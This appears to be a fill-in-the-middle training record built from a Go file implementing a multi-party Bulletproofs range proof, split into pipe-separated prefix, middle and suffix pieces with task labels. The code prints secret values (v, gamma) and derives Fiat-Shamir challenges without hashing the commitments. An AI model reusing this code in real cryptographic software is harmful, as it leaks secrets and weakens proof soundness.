tmp2 := EC.Zero()
// generate h'
HPrime := make([]ECPoint, len(EC.BPH))
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowersOfY[j*bitsPerValue+i], EC.N), EC)
}
}
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
val1 := new(big.Int).Mul(cz, PowersOfY[j*bitsPerValue+i])
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
val2 := new(big.Int).Mod(new(big.Int).Mul(zp, PowerOfTwos[i]), EC.N)
tmp2 = tmp2.Add(HPrime[j*bitsPerValue+i].Mult(new(big.Int).Add(val1, val2), EC), EC)
}
}
// without subtracting this value should equal muCH + l[i]G[i] + r[i]H'[i]
// we want to make sure that the innerproduct checks out, so we subtract it
P := mrp.A.Add(mrp.S.Mult(cx, EC), EC).Add(tmp1, EC).Add(tmp2, EC).Add(EC.H.Mult(mrp.Mu, EC).Neg(EC), EC)
//fmt.Println(P)
if !InnerProductVerifyFast(mrp.Th, P, EC.U, EC.BPG, HPrime, mrp.IPP, EC) {
fmt.Println("MPCVerify - Uh oh! Check line (65) of verification!")
return false
}
return true
}
| sPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bi | conditional_block |
mpc_range_proof.go | package mbp
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"math/big"
)
// MPCRangeProof is a struct of secure multi-party computation range proof
type MPCRangeProof struct {
Comms []ECPoint
A ECPoint
S ECPoint
T1 ECPoint
T2 ECPoint
Tau *big.Int
Th *big.Int
Mu *big.Int
IPP InnerProdArg
// challenges
Cy *big.Int
Cz *big.Int
Cx *big.Int
}
// PrivateParams is the private params of Prover
type PrivateParams struct {
Id int
V *big.Int
AL []*big.Int
AR []*big.Int
SL []*big.Int
SR []*big.Int
Gamma *big.Int
Alpha *big.Int
Rho *big.Int
Tt0 *big.Int
Tt1 *big.Int
Tt2 *big.Int
Tau1 *big.Int
Tau2 *big.Int
}
type InitParams struct {
//EC CryptoParams
N int
M int
}
type ASCommitment struct {
Comm ECPoint
A ECPoint
S ECPoint
}
type T1T2Commitment struct {
T1 ECPoint
T2 ECPoint
}
type OtherShare struct {
Left []*big.Int
Right []*big.Int
That *big.Int
Taux *big.Int
Mu *big.Int
}
func AandS(v *big.Int, id, m int, prip *PrivateParams, EC CryptoParams) ASCommitment {
AS := ASCommitment{}
fmt.Printf("v: %v\n", v)
bitsPerValue := EC.V / m //
if v.Cmp(big.NewInt(0)) == -1 {
panic("Value is below range! Not proving")
}
if v.Cmp(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(bitsPerValue)), EC.N)) == 1 {
panic("Value is above range! Not proving.")
}
prip.Id = id
prip.V = v
gamma, err := rand.Int(rand.Reader, EC.N)
prip.Gamma = gamma
fmt.Printf("gamma: %v\n", gamma)
check(err)
comm := EC.G.Mult(v, EC).Add(EC.H.Mult(gamma, EC), EC)
AS.Comm = comm
aL := reverse(StrToBigIntArray(PadLeft(fmt.Sprintf("%b", v), "0", bitsPerValue)))
prip.AL = aL
aR := VectorAddScalar(aL, big.NewInt(-1), EC)
prip.AR = aR
alpha, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Alpha = alpha
// 设置cryptoparams.go中 v = n * m
BPG := EC.BPG[id*bitsPerValue : (id+1)*bitsPerValue]
BPH := EC.BPH[id*bitsPerValue : (id+1)*bitsPerValue]
A := TwoVectorPCommitWithGens(BPG, BPH, aL, aR, EC).Add(EC.H.Mult(alpha, EC), EC)
AS.A = A
sL := RandVector(bitsPerValue, EC)
sR := RandVector(bitsPerValue, EC)
prip.SL = sL
prip.SR = sR
rho, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Rho = rho
S := TwoVectorPCommitWithGens(BPG, BPH, sL, sR, EC).Add(EC.H.Mult(rho, EC), EC)
AS.S = S
return AS
}
func Fait_y_z(A, S []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) (*big.Int, *big.Int) {
countA := EC.Zero()
countS := EC.Zero()
for i := 0; i < len(A); i++ {
// 是代码中定义的加 代码定义
countA = countA.Add(A[i], EC)
countS = countS.Add(S[i], EC)
}
mpcrp.A = countA
mpcrp.S = countS
chal1s256 := sha256.Sum256([]byte(countA.X.String() + countA.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
mpcrp.Cy = cy
chal2s256 := sha256.Sum256([]byte(countS.X.String() + countS.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
mpcrp.Cz = cz
return cy, cz
}
/*
DeltaMPC is a helper function that is used in the range proof
\DeltaMPC(y, z) = (z-z^2)<1^n, y^n> - z^3 * z^j * <1^n, 2^n>
*/
func DeltaMPC(y []*big.Int, z *big.Int, id, m int, EC CryptoParams) *big.Int {
result := big.NewInt(0)
// (z-z^2)<1^n, y^n>
z2 := new(big.Int).Mod(new(big.Int).Mul(z, z), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Sub(z, z2), EC.N)
t2 := new(big.Int).Mod(new(big.Int).Mul(t1, VectorSum(y, EC)), EC.N)
// z^(3+j)<1^n, 2^n>
z3j := new(big.Int).Exp(z, big.NewInt(3+int64(id)), EC.N)
po2sum := new(big.Int).Sub(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(EC.V/m)), EC.N), big.NewInt(1))
t3 := new(big.Int).Mod(new(big.Int).Mul(z3j, po2sum), EC.N)
result = new(big.Int).Mod(new(big.Int).Sub(t2, t3), EC.N)
return result
}
func T1andT2(v *big.Int, id, m int, | *big.Int, prip *PrivateParams, EC CryptoParams) T1T2Commitment {
t1t2 := T1T2Commitment{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
bitsPerValue := EC.V / m
// PowerOfTwos
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
PowerOfCY := PowerVector(EC.V, cy, EC) // EC.V = n * m
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
l0 := VectorAddScalar(aL, new(big.Int).Neg(cz), EC)
l1 := sL
r0 := VectorAdd(
VectorHadamard(
yn,
VectorAddScalar(aR, cz, EC), EC),
z2j2n, EC)
r1 := VectorHadamard(sR, yn, EC)
//calculate t0
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
PowerOfCZ := PowerVector(m, cz, EC)
vz2 := new(big.Int).Mul(PowerOfCZ[id], new(big.Int).Mul(v, z2))
vz2 = new(big.Int).Mod(vz2, EC.N)
t0 := new(big.Int).Mod(new(big.Int).Add(vz2, DeltaMPC(yn, cz, id, m, EC)), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Add(InnerProduct(l1, r0, EC), InnerProduct(l0, r1, EC)), EC.N)
t2 := InnerProduct(l1, r1, EC)
prip.Tt0 = t0
prip.Tt1 = t1
prip.Tt2 = t2
// given the t_i values, we can generate commitments to them
tau1, err := rand.Int(rand.Reader, EC.N)
check(err)
tau2, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Tau1 = tau1
prip.Tau2 = tau2
T1 := EC.G.Mult(t1, EC).Add(EC.H.Mult(tau1, EC), EC) //commitment to t1
T2 := EC.G.Mult(t2, EC).Add(EC.H.Mult(tau2, EC), EC) //commitment to t2
t1t2.T1 = T1
t1t2.T2 = T2
return t1t2
}
func Fait_x(T1, T2 []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) *big.Int {
countT1 := EC.Zero()
countT2 := EC.Zero()
for i := 0; i < len(T1); i++ {
countT1 = countT1.Add(T1[i], EC)
countT2 = countT2.Add(T2[i], EC)
}
mpcrp.T1 = countT1
mpcrp.T2 = countT2
chal3s256 := sha256.Sum256([]byte(countT1.X.String() + countT1.Y.String() + countT2.X.String() + countT2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
mpcrp.Cx = cx
return cx
}
func ProFinal(v *big.Int, id, m int, cy, cz, cx *big.Int, prip *PrivateParams, EC CryptoParams) OtherShare {
share := OtherShare{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
// PowerOfCY PowerOfTwos zPowersTimesTwoVec
bitsPerValue := EC.V / m
PowerOfCY := PowerVector(EC.V, cy, EC)
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
left := CalculateLMRP(aL, sL, cz, cx, EC)
right := CalculateRMRP(aR, sR, yn, z2j2n, cz, cx, EC)
share.Left = left
share.Right = right
// t0 t1 t2
t0 := prip.Tt0
t1 := prip.Tt1
t2 := prip.Tt2
thatPrime := new(big.Int).Mod( // t0 + t1*x + t2*x^2
new(big.Int).Add(t0, new(big.Int).Add(new(big.Int).Mul(t1, cx), new(big.Int).Mul(new(big.Int).Mul(cx, cx), t2))), EC.N)
that := InnerProduct(left, right, EC) // NOTE: BP Java implementation calculates this from the t_i
// thatPrime and that should be equal
if thatPrime.Cmp(that) != 0 {
fmt.Println("Proving -- Uh oh! Two diff ways to compute same value not working")
fmt.Printf("\tthatPrime = %s\n", thatPrime.String())
fmt.Printf("\tthat = %s \n", that.String())
}
share.That = that
// tau1, tau2, gamma rho
tau1 := prip.Tau1
tau2 := prip.Tau2
gamma := prip.Gamma
rho := prip.Rho
alpha := prip.Alpha
fmt.Printf("gamma: %v\n", gamma)
taux1 := new(big.Int).Mod(new(big.Int).Mul(tau2, new(big.Int).Mul(cx, cx)), EC.N)
taux2 := new(big.Int).Mod(new(big.Int).Mul(tau1, cx), EC.N)
z2j := new(big.Int).Exp(cz, big.NewInt(2+int64(id)), EC.N)
tmp1 := new(big.Int).Mul(gamma, z2j)
taux := new(big.Int).Mod(new(big.Int).Add(taux1, new(big.Int).Add(taux2, tmp1)), EC.N)
mu := new(big.Int).Mod(new(big.Int).Add(alpha, new(big.Int).Mul(rho, cx)), EC.N)
share.Taux = taux
share.Mu = mu
return share
}
func DealerFinal(left, right []*big.Int, tx, rx, mu []*big.Int, m int, mpcrp *MPCRangeProof, cy *big.Int, EC CryptoParams) {
countThat := big.NewInt(0)
countTaux := big.NewInt(0)
countMu := big.NewInt(0)
countLeft := left
countRight := right
bitsPerValue := EC.V / m
for j := 0; j < len(tx); j++ {
countThat = new(big.Int).Add(countThat, tx[j])
countTaux = new(big.Int).Add(countTaux, rx[j])
countMu = new(big.Int).Add(countMu, mu[j])
}
mpcrp.Tau = countTaux
mpcrp.Th = countThat
mpcrp.Mu = countMu
HPrime := make([]ECPoint, len(EC.BPH))
PowerOfCY := PowerVector(EC.V, cy, EC)
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowerOfCY[j*bitsPerValue+i], EC.N), EC)
}
}
P := TwoVectorPCommitWithGens(EC.BPG, HPrime, countLeft, countRight, EC)
that := InnerProduct(countLeft, countRight, EC)
IPP := InnerProductProve(countLeft, countRight, that, P, EC.U, EC.BPG, HPrime, EC)
mpcrp.IPP = IPP
}
func MPCVerify(mrp *MPCRangeProof, EC CryptoParams) bool {
m := len(mrp.Comms)
bitsPerValue := EC.V / m
//changes:
// check 1 changes since it includes all commitments
// check 2 commitment generation is also different
// verify the challenges
chal1s256 := sha256.Sum256([]byte(mrp.A.X.String() + mrp.A.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
if cy.Cmp(mrp.Cy) != 0 {
fmt.Println("MPCVerify - Challenge Cy failing!")
return false
}
chal2s256 := sha256.Sum256([]byte(mrp.S.X.String() + mrp.S.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
if cz.Cmp(mrp.Cz) != 0 {
fmt.Println("MPCVerify - Challenge Cz failing!")
return false
}
chal3s256 := sha256.Sum256([]byte(mrp.T1.X.String() + mrp.T1.Y.String() + mrp.T2.X.String() + mrp.T2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
if cx.Cmp(mrp.Cx) != 0 {
fmt.Println("MPCVerify - Challenge Cx failing!")
return false
}
// given challenges are correct, very range proof
PowersOfY := PowerVector(EC.V, cy, EC)
// t_hat * G + tau * H
lhs := EC.G.Mult(mrp.Th, EC).Add(EC.H.Mult(mrp.Tau, EC), EC)
// z^2 * \bold{z}^m \bold{V} + delta(y,z) * G + x * T1 + x^2 * T2
CommPowers := EC.Zero()
PowersOfZ := PowerVector(m, cz, EC)
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
for j := 0; j < m; j++ {
CommPowers = CommPowers.Add(mrp.Comms[j].Mult(new(big.Int).Mul(z2, PowersOfZ[j]), EC), EC)
}
rhs := EC.G.Mult(DeltaMRP(PowersOfY, cz, m, EC), EC).Add(
mrp.T1.Mult(cx, EC), EC).Add(
mrp.T2.Mult(new(big.Int).Mul(cx, cx), EC), EC).Add(CommPowers, EC)
if !lhs.Equal(rhs) {
fmt.Println("MPCVerify - Uh oh! Check line (63) of verification")
fmt.Println(rhs)
fmt.Println(lhs)
return false
}
tmp1 := EC.Zero()
zneg := new(big.Int).Mod(new(big.Int).Neg(cz), EC.N)
for i := range EC.BPG {
tmp1 = tmp1.Add(EC.BPG[i].Mult(zneg, EC), EC)
}
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
tmp2 := EC.Zero()
// generate h'
HPrime := make([]ECPoint, len(EC.BPH))
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowersOfY[j*bitsPerValue+i], EC.N), EC)
}
}
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
val1 := new(big.Int).Mul(cz, PowersOfY[j*bitsPerValue+i])
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
val2 := new(big.Int).Mod(new(big.Int).Mul(zp, PowerOfTwos[i]), EC.N)
tmp2 = tmp2.Add(HPrime[j*bitsPerValue+i].Mult(new(big.Int).Add(val1, val2), EC), EC)
}
}
// without subtracting this value should equal muCH + l[i]G[i] + r[i]H'[i]
// we want to make sure that the innerproduct checks out, so we subtract it
P := mrp.A.Add(mrp.S.Mult(cx, EC), EC).Add(tmp1, EC).Add(tmp2, EC).Add(EC.H.Mult(mrp.Mu, EC).Neg(EC), EC)
//fmt.Println(P)
if !InnerProductVerifyFast(mrp.Th, P, EC.U, EC.BPG, HPrime, mrp.IPP, EC) {
fmt.Println("MPCVerify - Uh oh! Check line (65) of verification!")
return false
}
return true
}
| cy, cz | identifier_name |
mpc_range_proof.go | package mbp
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"math/big"
)
// MPCRangeProof is a struct of secure multi-party computation range proof
type MPCRangeProof struct {
Comms []ECPoint
A ECPoint
S ECPoint
T1 ECPoint
T2 ECPoint
Tau *big.Int
Th *big.Int
Mu *big.Int
IPP InnerProdArg
// challenges
Cy *big.Int
Cz *big.Int
Cx *big.Int
}
// PrivateParams is the private params of Prover
type PrivateParams struct {
Id int
V *big.Int
AL []*big.Int
AR []*big.Int
SL []*big.Int
SR []*big.Int
Gamma *big.Int
Alpha *big.Int
Rho *big.Int
Tt0 *big.Int
Tt1 *big.Int
Tt2 *big.Int
Tau1 *big.Int
Tau2 *big.Int
}
type InitParams struct {
//EC CryptoParams
N int
M int
}
type ASCommitment struct {
Comm ECPoint
A ECPoint
S ECPoint
}
type T1T2Commitment struct {
T1 ECPoint
T2 ECPoint
}
type OtherShare struct {
Left []*big.Int
Right []*big.Int
That *big.Int
Taux *big.Int
Mu *big.Int
}
func AandS(v *big.Int, id, m int, prip *PrivateParams, EC CryptoParams) ASCommitment {
AS := ASCommitment{}
fmt.Printf("v: %v\n", v)
bitsPerValue := EC.V / m //
if v.Cmp(big.NewInt(0)) == -1 {
panic("Value is below range! Not proving")
}
if v.Cmp(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(bitsPerValue)), EC.N)) == 1 {
panic("Value is above range! Not proving.")
}
prip.Id = id
prip.V = v
gamma, err := rand.Int(rand.Reader, EC.N)
prip.Gamma = gamma
fmt.Printf("gamma: %v\n", gamma)
check(err)
comm := EC.G.Mult(v, EC).Add(EC.H.Mult(gamma, EC), EC)
AS.Comm = comm
aL := reverse(StrToBigIntArray(PadLeft(fmt.Sprintf("%b", v), "0", bitsPerValue)))
prip.AL = aL
aR := VectorAddScalar(aL, big.NewInt(-1), EC)
prip.AR = aR
alpha, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Alpha = alpha
// 设置cryptoparams.go中 v = n * m
BPG := EC.BPG[id*bitsPerValue : (id+1)*bitsPerValue]
BPH := EC.BPH[id*bitsPerValue : (id+1)*bitsPerValue]
A := TwoVectorPCommitWithGens(BPG, BPH, aL, aR, EC).Add(EC.H.Mult(alpha, EC), EC)
AS.A = A
sL := RandVector(bitsPerValue, EC)
sR := RandVector(bitsPerValue, EC)
prip.SL = sL
prip.SR = sR
rho, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Rho = rho
S := TwoVectorPCommitWithGens(BPG, BPH, sL, sR, EC).Add(EC.H.Mult(rho, EC), EC)
AS.S = S
return AS
}
func Fait_y_z(A, S []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) (*big.Int, *big.Int) {
countA := EC.Zero()
countS := EC.Zero()
for i := 0; i < len(A); i++ {
// 是代码中定义的加 代码定义
countA = countA.Add(A[i], EC)
countS = countS.Add(S[i], EC)
}
mpcrp.A = countA
mpcrp.S = countS
chal1s256 := sha256.Sum256([]byte(countA.X.String() + countA.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
mpcrp.Cy = cy
chal2s256 := sha256.Sum256([]byte(countS.X.String() + countS.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
mpcrp.Cz = cz
return cy, cz
}
/*
DeltaMPC is a helper function that is used in the range proof
\DeltaMPC(y, z) = (z-z^2)<1^n, y^n> - z^3 * z^j * <1^n, 2^n>
*/
func DeltaMPC(y []*big.Int, z *big.Int, id, m int, EC CryptoParams) *big.Int {
result := big.NewInt(0)
// (z-z^2)<1^n, y^n>
z2 := new(big.Int).Mod(new(big.Int).Mul(z, z), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Sub(z, z2), EC.N)
t2 := new(big.Int).Mod(new(big.Int).Mul(t1, VectorSum(y, EC)), EC.N)
// z^(3+j)<1^n, 2^n>
z3j := new(big.Int).Exp(z, big.NewInt(3+int64(id)), EC.N)
po2sum := new(big.Int).Sub(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(EC.V/m)), EC.N), big.NewInt(1))
t3 := new(big.Int).Mod(new(big.Int).Mul(z3j, po2sum), EC.N)
result = new(big.Int).Mod(new(big.Int).Sub(t2, t3), EC.N)
return result
}
func T1andT2(v *big.Int, id, m int, cy, cz *big.Int, prip *PrivateParams, EC CryptoParams) T1T2Commitment {
t1t2 := T1T2Commitment{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
bitsPerValue := EC.V / m
// PowerOfTwos
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
PowerOfCY := PowerVector(EC.V, cy, EC) // EC.V = n * m
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
l0 := VectorAddScalar(aL, new(big.Int).Neg(cz), EC)
l1 := sL
r0 := VectorAdd(
VectorHadamard(
yn,
VectorAddScalar(aR, cz, EC), EC),
z2j2n, EC)
r1 := VectorHadamard(sR, yn, EC)
//calculate t0
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
PowerOfCZ := PowerVector(m, cz, EC)
vz2 := new(big.Int).Mul(PowerOfCZ[id], new(big.Int).Mul(v, z2))
vz2 = new(big.Int).Mod(vz2, EC.N)
t0 := new(big.Int).Mod(new(big.Int).Add(vz2, DeltaMPC(yn, cz, id, m, EC)), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Add(InnerProduct(l1, r0, EC), InnerProduct(l0, r1, EC)), EC.N)
t2 := InnerProduct(l1, r1, EC)
prip.Tt0 = t0
prip.Tt1 = t1
prip.Tt2 = t2
// given the t_i values, we can generate commitments to them
tau1, err := rand.Int(rand.Reader, EC.N)
check(err)
tau2, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Tau1 = tau1
prip.Tau2 = tau2
T1 := EC.G.Mult(t1, EC).Add(EC.H.Mult(tau1, EC), EC) //commitment to t1
T2 := EC.G.Mult(t2, EC).Add(EC.H.Mult(tau2, EC), EC) //commitment to t2
t1t2.T1 = T1
t1t2.T2 = T2
return t1t2
}
func Fait_x(T1, T2 []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) *big.Int {
countT1 := EC.Zero()
countT2 := EC.Zero()
for i := 0; i < len(T1); i++ {
countT1 = countT1.Add(T1[i], EC)
countT2 = countT2.Add(T2[i], EC)
}
mpcrp.T1 = countT1
mpcrp.T2 = countT2
chal3s256 := sha256.Sum256([]byte(countT1.X.String() + countT1.Y.String() + countT2.X.String() + countT2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
mpcrp.Cx = cx
return cx
}
func ProFinal(v *big.Int, id, m int, cy, cz, cx *big.Int, prip *PrivateParams, EC CryptoParams) OtherShare {
share := OtherShare{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
// PowerOfCY PowerOfTwos zPowersTimesTwoVec
bitsPerValue := EC.V / m
PowerOfCY := PowerVector(EC.V, cy, EC)
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
left := CalculateLMRP(aL, sL, cz, cx, EC)
right := CalculateRMRP(aR, sR, yn, z2j2n, cz, cx, EC)
share.Left = left
share.Right = right
// t0 t1 t2
t0 := prip.Tt0
t1 := prip.Tt1
t2 := prip.Tt2
thatPrime := new(big.Int).Mod( // t0 + t1*x + t2*x^2
new(big.Int).Add(t0, new(big.Int).Add(new(big.Int).Mul(t1, cx), new(big.Int).Mul(new(big.Int).Mul(cx, cx), t2))), EC.N)
that := InnerProduct(left, right, EC) // NOTE: BP Java implementation calculates this from the t_i
// thatPrime and that should be equal
if thatPrime.Cmp(that) != 0 {
fmt.Println("Proving -- Uh oh! Two diff ways to compute same value not working")
fmt.Printf("\tthatPrime = %s\n", thatPrime.String())
fmt.Printf("\tthat = %s \n", that.String())
}
share.That = that
// tau1, tau2, gamma rho
tau1 := prip.Tau1
tau2 := prip.Tau2
gamma := prip.Gamma
rho := prip.Rho
alpha := prip.Alpha
fmt.Printf("gamma: %v\n", gamma)
taux1 := new(big.Int).Mod(new(big.Int).Mul(tau2, new(big.Int).Mul(cx, cx)), EC.N)
taux2 := new(big.Int).Mod(new(big.Int).Mul(tau1, cx), EC.N)
z2j := new(big.Int).Exp(cz, big.NewInt(2+int64(id)), EC.N)
tmp1 := new(big.Int).Mul(gamma, z2j)
taux := new(big.Int).Mod(new(big.Int).Add(taux1, new(big.Int).Add(taux2, tmp1)), EC.N)
mu := new(big.Int).Mod(new(big.Int).Add(alpha, new(big.Int).Mul(rho, cx)), EC.N)
share.Taux = taux
share.Mu = mu
return share
}
func DealerFinal(left, right []*big.Int, tx, rx, mu []*big.Int, m int, mpcrp *MPCRangeProof, cy *big.Int, EC CryptoParams) {
countThat := big.NewInt(0)
countTaux := big.NewInt(0)
countMu := big.NewInt(0)
countLeft := left
countRight := right
bitsPerValue := EC.V / m
for j := 0; j < len(tx); j++ {
countThat = new(big.Int).Add(countThat, tx[j])
countTaux = new(big.Int).Add(countTaux, rx[j])
countMu = new(big.Int).Add(countMu, mu[j])
}
mpcrp.Tau = countTaux
mpcrp.Th = countThat
mpcrp.Mu = countMu
HPrime := make([]ECPoint, len(EC.BPH))
PowerOfCY := PowerVector(EC.V, cy, EC)
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowerOfCY[j*bitsPerValue+i], EC.N), EC)
}
}
P := TwoVectorPCommitWithGens(EC.BPG, HPrime, countLeft, countRight, EC)
that := InnerProduct(countLeft, countRight, EC)
IPP := InnerProductProve(countLeft, countRight, that, P, EC.U, EC.BPG, HPrime, EC)
mpcrp.IPP = IPP
}
func MPCVerify(mrp *MPCRangeProof, EC CryptoParams) bool {
m := len(mrp.Comms)
bits | PerValue := EC.V / m
//changes:
// check 1 changes since it includes all commitments
// check 2 commitment generation is also different
// verify the challenges
chal1s256 := sha256.Sum256([]byte(mrp.A.X.String() + mrp.A.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
if cy.Cmp(mrp.Cy) != 0 {
fmt.Println("MPCVerify - Challenge Cy failing!")
return false
}
chal2s256 := sha256.Sum256([]byte(mrp.S.X.String() + mrp.S.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
if cz.Cmp(mrp.Cz) != 0 {
fmt.Println("MPCVerify - Challenge Cz failing!")
return false
}
chal3s256 := sha256.Sum256([]byte(mrp.T1.X.String() + mrp.T1.Y.String() + mrp.T2.X.String() + mrp.T2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
if cx.Cmp(mrp.Cx) != 0 {
fmt.Println("MPCVerify - Challenge Cx failing!")
return false
}
// given challenges are correct, very range proof
PowersOfY := PowerVector(EC.V, cy, EC)
// t_hat * G + tau * H
lhs := EC.G.Mult(mrp.Th, EC).Add(EC.H.Mult(mrp.Tau, EC), EC)
// z^2 * \bold{z}^m \bold{V} + delta(y,z) * G + x * T1 + x^2 * T2
CommPowers := EC.Zero()
PowersOfZ := PowerVector(m, cz, EC)
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
for j := 0; j < m; j++ {
CommPowers = CommPowers.Add(mrp.Comms[j].Mult(new(big.Int).Mul(z2, PowersOfZ[j]), EC), EC)
}
rhs := EC.G.Mult(DeltaMRP(PowersOfY, cz, m, EC), EC).Add(
mrp.T1.Mult(cx, EC), EC).Add(
mrp.T2.Mult(new(big.Int).Mul(cx, cx), EC), EC).Add(CommPowers, EC)
if !lhs.Equal(rhs) {
fmt.Println("MPCVerify - Uh oh! Check line (63) of verification")
fmt.Println(rhs)
fmt.Println(lhs)
return false
}
tmp1 := EC.Zero()
zneg := new(big.Int).Mod(new(big.Int).Neg(cz), EC.N)
for i := range EC.BPG {
tmp1 = tmp1.Add(EC.BPG[i].Mult(zneg, EC), EC)
}
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
tmp2 := EC.Zero()
// generate h'
HPrime := make([]ECPoint, len(EC.BPH))
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowersOfY[j*bitsPerValue+i], EC.N), EC)
}
}
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
val1 := new(big.Int).Mul(cz, PowersOfY[j*bitsPerValue+i])
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
val2 := new(big.Int).Mod(new(big.Int).Mul(zp, PowerOfTwos[i]), EC.N)
tmp2 = tmp2.Add(HPrime[j*bitsPerValue+i].Mult(new(big.Int).Add(val1, val2), EC), EC)
}
}
// without subtracting this value should equal muCH + l[i]G[i] + r[i]H'[i]
// we want to make sure that the innerproduct checks out, so we subtract it
P := mrp.A.Add(mrp.S.Mult(cx, EC), EC).Add(tmp1, EC).Add(tmp2, EC).Add(EC.H.Mult(mrp.Mu, EC).Neg(EC), EC)
//fmt.Println(P)
if !InnerProductVerifyFast(mrp.Th, P, EC.U, EC.BPG, HPrime, mrp.IPP, EC) {
